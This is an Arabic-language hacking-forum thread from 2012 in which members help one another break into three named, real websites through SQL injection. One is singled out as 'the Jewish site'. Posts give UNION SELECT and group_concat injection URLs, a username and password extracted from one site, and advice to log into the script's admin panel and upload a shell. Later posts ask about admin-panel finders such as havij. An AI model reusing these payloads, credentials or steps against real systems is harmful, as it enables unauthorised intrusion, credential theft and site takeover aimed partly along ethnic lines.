التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 01-19-2012, 10:24 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية booba007
 

 

 
إحصائية العضو






booba007 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
booba007 is on a distinguished road

افتراضي غير مجاب: مشاكل في sql injection


السلام عليكم

المشكلة الأولى

المعلومات التي وجدتها على هدى الموقع اليهودي

http://www.israel-diaspora.info/arti...,9,10,11,12,13

community.5.0.92
password>lelien_isradiasp>userkeys
login:redacteur
password:pascale+
www.israel-diaspora.info/cpanel

لكن عندما أقوم بإذخال user وpassword
Login Attempt Failed!
----------------------------------------------------------------------

---------------
المشكلة الثانية

http://www.tsume-art.com/fr/gallery.php?s=-1+union+select+1,2,3--

عدم ضهور الأعمدة المصابة
----------------------------------------------------------------------

----------------
المشكلة التالتة

http://www.chronicart.com/webmag/article.php?id=-

1734+UNION+SELECT+1,2,3,4,5,8,7,8,9,10


post_password>chronicart>ca_posts

http://www.chronicart.com/webmag/article.php?id=-

1734+UNION+SELECT+1,2,3,4,5,post_password,7,8,9,10 +from+ca_posts--

عدم ضهور password

وشكرا على كل حال




Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC lah;g td sql injection

   

رد مع اقتباس
قديم 01-19-2012, 10:39 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو






مذكرة الموت غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مذكرة الموت is on a distinguished road

افتراضي رد: مشاكل في sql injection


بالنسبه للموقع الاول الاعمده تظهر عاددي رقم العمود المصاب هو 4+9+2+3

   

رد مع اقتباس
قديم 01-19-2012, 10:47 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو






مذكرة الموت غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مذكرة الموت is on a distinguished road

افتراضي رد: مشاكل في sql injection


بالنسبه للموقع الثاني شوف حبيبي انت اخترت جدول خطا في جدول اسمه ca_users
راح تقولي كيف طلعته اسخدم الامر group قبل concat يعني راح يصير كذا

اقتباس
Group_concat(table_name,0x3a,column_name,0x3a,tabl e_schema

وهذه الحقنه النهائيه
اقتباس
http://www.chronicart.com/webmag/art...rom+ca_users--


التعديل الأخير تم بواسطة مذكرة الموت ; 01-19-2012 الساعة 10:49 PM.

   

رد مع اقتباس
قديم 01-19-2012, 10:54 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






مذكرة الموت غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مذكرة الموت is on a distinguished road

افتراضي رد: مشاكل في sql injection


وهذه الحقنه النهائيه للموقع الاسرائيلي

اقتباس
http://www.israel-diaspora.info/arti...rom+userkeys--

واستخدمت الامر group ارجو ان تستخدمه كل مهر فهو يجمع الجداول ويتخطى الفلتره

   

رد مع اقتباس
قديم 01-19-2012, 10:55 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: مشاكل في sql injection


شوف دورة اخونا فولكانو

التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 01-20-2012, 01:59 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية booba007
 

 

 
إحصائية العضو






booba007 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
booba007 is on a distinguished road

افتراضي رد: مشاكل في sql injection


أشكركم يا إخوتي على المساعدة
وسوف أرى دورة فولكانو
و لكن سؤالي في الموقع الأول هو عندما أقوم بإذخال user وpassword
في ال cpanel تخرج رسالة تقول فشل محاولة تسجيل الدخول

   

رد مع اقتباس
قديم 01-20-2012, 02:23 AM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية aircrack -ng
 

 

 
إحصائية العضو







aircrack -ng غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 21
aircrack -ng is on a distinguished road

افتراضي رد: مشاكل في sql injection


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة booba007
أشكركم يا إخوتي على المساعدة
وسوف أرى دورة فولكانو
و لكن سؤالي في الموقع الأول هو عندما أقوم بإذخال user وpassword
في ال cpanel تخرج رسالة تقول فشل محاولة تسجيل الدخول

لانو مسار السي بنل مو لحة الادمن
التوقيع

الموت ياتي بغته والقبر صندوق العمل


http://www.tvquran.com/


(من تواضع لله رفع)



vbspiders team

 

   

رد مع اقتباس
قديم 01-20-2012, 02:38 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية booba007
 

 

 
إحصائية العضو






booba007 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
booba007 is on a distinguished road

افتراضي رد: مشاكل في sql injection


ما الفرق بين cpanel و لوحة الادمن
هل يمكنك مساعدتي في إيجاد لوحة الادمن لقد بحت عنه بالبرنامج admin.pl لكن لم أجده
و شكرا على الرد

   

رد مع اقتباس
قديم 01-20-2012, 06:56 PM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية Dr.NaNo
 

 

 
إحصائية العضو







Dr.NaNo غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
Dr.NaNo is on a distinguished road

افتراضي رد: مشاكل في sql injection


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة booba007
ما الفرق بين cpanel و لوحة الادمن
هل يمكنك مساعدتي في إيجاد لوحة الادمن لقد بحت عنه بالبرنامج admin.pl لكن لم أجده
و شكرا على الرد

نعم هناك فرق كبير أخي الكريم.

لوحة السي بنل cpanel هي اللوحة الأم للموقع ويمكن من خلال هذه اللوحة عمل أشياء كثيرة مثل عمل حسابات ftp او عمل سب دومين او إنشاء قاعدة بيانات والكثير .

اما بالنسبة للحقنه التي استخرجته منها اليوزر والباسورد فهي لقاعدة بيانات احدى السكربتات التي قام بتركيبها صاحب الموقع. وهذا السكربت وكل سكربت له لوحة تحكم تتحكم في عمل السكربت من مواضيع او ردود او رفع ملفات وصور. ومن خلال حقنك للسكربت واستخراج اليوزر والباسورد فقط اذهب إلى لوحة التحكم الخاصة لهذا ( السكربت ) وليس السي بنل لان السي بنل ليس له علاقة. ثم بعد ذلك ضع اليوزر والباسورد في لوحة التحكم تبع السكربت وسوف يتم الدخول وبعد الدخول قم برفع شل او كما تشاء.

بالتوفيق.Dr.NaNo
التوقيع

http://www.vbspiders.com/vb/t61978.html

 

   

رد مع اقتباس
قديم 01-21-2012, 11:34 AM   رقم المشاركة : 10 (permalink)
معلومات العضو
 
الصورة الرمزية booba007
 

 

 
إحصائية العضو






booba007 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
booba007 is on a distinguished road

افتراضي رد: مشاكل في sql injection


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة Dr.NaNo
نعم هناك فرق كبير أخي الكريم.

لوحة السي بنل cpanel هي اللوحة الأم للموقع ويمكن من خلال هذه اللوحة عمل أشياء كثيرة مثل عمل حسابات ftp او عمل سب دومين او إنشاء قاعدة بيانات والكثير .

اما بالنسبة للحقنه التي استخرجته منها اليوزر والباسورد فهي لقاعدة بيانات احدى السكربتات التي قام بتركيبها صاحب الموقع. وهذا السكربت وكل سكربت له لوحة تحكم تتحكم في عمل السكربت من مواضيع او ردود او رفع ملفات وصور. ومن خلال حقنك للسكربت واستخراج اليوزر والباسورد فقط اذهب إلى لوحة التحكم الخاصة لهذا ( السكربت ) وليس السي بنل لان السي بنل ليس له علاقة. ثم بعد ذلك ضع اليوزر والباسورد في لوحة التحكم تبع السكربت وسوف يتم الدخول وبعد الدخول قم برفع شل او كما تشاء.

بالتوفيق.Dr.NaNo

شكرا يا أخي على شرحك الواضح
لكن لم أجد مسار لوحة الادمن لهذ الموقع
http://www.israel-diaspora.info
لقد بحت عنه بالبرنامج admin.pl و havij
هل توجد طريقة لإيجاد مسار لوحة الادمن عن طريق الحقن أم لا توضع المسارات في قاعدة بيانات
و شكرا

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 04:14 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0